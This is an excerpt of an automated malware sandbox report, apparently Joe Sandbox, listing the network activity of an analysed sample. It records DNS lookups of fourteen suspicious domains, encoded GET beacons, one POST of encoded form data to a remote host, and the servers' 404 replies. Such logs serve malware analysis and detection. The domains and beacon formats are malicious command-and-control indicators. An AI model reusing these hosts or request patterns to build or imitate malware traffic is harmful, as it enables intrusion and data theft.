                Source: Joe Sandbox ViewIP Address: 172.67.129.38 172.67.129.38
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.7261ltajbc.bondConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kkpmoneysocial.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.artkub.netConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.123hellodrive.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zoomlive.liveConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dietcoffee.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /v2ut/?NVK8=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLbDhgs8DELm8MllGE9YflG7OlToR8O0B4KwAawBiq2KURdg==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /2pcx/?NVK8=WvMwIEBZ0GXEfEVGpcmqJr8xhaJ22fvMS8l3C/jH9UlzXoFcq8ozyiMxUW2Crv9xh6g9FMonHDW5wf9fDGMh/a7sRXpo9EZKPLBX7XcfSv3IAkyUxscM38Xc6L1z4gDQDA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aziziyeescortg.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.supernutra01.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.54248711.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /zmax/?NVK8=c4BENRMdvExsGH0SBTpe30rq6PgBdYYINfe+1MbqTEgo+clVhexpavqEdWzY6VY2Bf1XKclHU3L+/KXqkFrj6MgG392Vu6gwiCPkGxCor7quDyVMbfsrwMj3Ae4U3nGzRw==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bagatowcannabis.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.kkpmoneysocial.top
                Source: global trafficDNS traffic detected: DNS query: www.artkub.net
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.123hellodrive.shop
                Source: global trafficDNS traffic detected: DNS query: www.zoomlive.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.54248711.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bagatowcannabis.cloud
                Source: unknownHTTP traffic detected: POST /bsye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.muasamgiare.clickCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeOrigin: http://www.muasamgiare.clickReferer: http://www.muasamgiare.click/bsye/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20Data Raw: 4e 56 4b 38 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 4b 57 55 2f 4e 7a 4e 49 41 6a 69 41 6f 6d 6a 5a 31 73 64 4b 41 45 79 49 51 58 79 35 4f 43 75 76 75 59 30 6f 62 46 46 45 61 46 6d 6e 69 7a 61 33 70 48 39 58 72 6f 4d 48 39 57 65 7a 59 73 58 48 74 5a 63 46 56 78 2b 38 63 7a 38 68 4f 31 71 46 6d 7a 41 58 6c 61 38 74 59 64 59 68 4e 73 66 6c 70 64 35 73 36 6b 42 56 71 35 68 4e 78 68 52 53 45 51 63 34 30 6c 4b 36 4a 6f 73 38 50 77 6a 65 66 50 42 6a 4e 46 78 4e 33 34 43 4d 37 48 32 78 71 6d 43 4b 34 6c 43 69 4a 38 4c 2b 46 46 49 68 4b 50 4c 49 77 62 33 65 49 70 33 69 4a 61 35 51 4a 45 4b 63 52 51 6b 78 6b 52 38 3d Data Ascii: NVK8=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4lCiJ8L+FFIhKPLIwb3eIp3iJa5QJEKcRQkxkR8=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:51:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Sat, 14 Dec 2024 12:55:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 14 Dec 2024 12:51:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 14 Dec 2024 12:51:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 14 Dec 2024 12:51:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 14 Dec 2024 12:51:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>
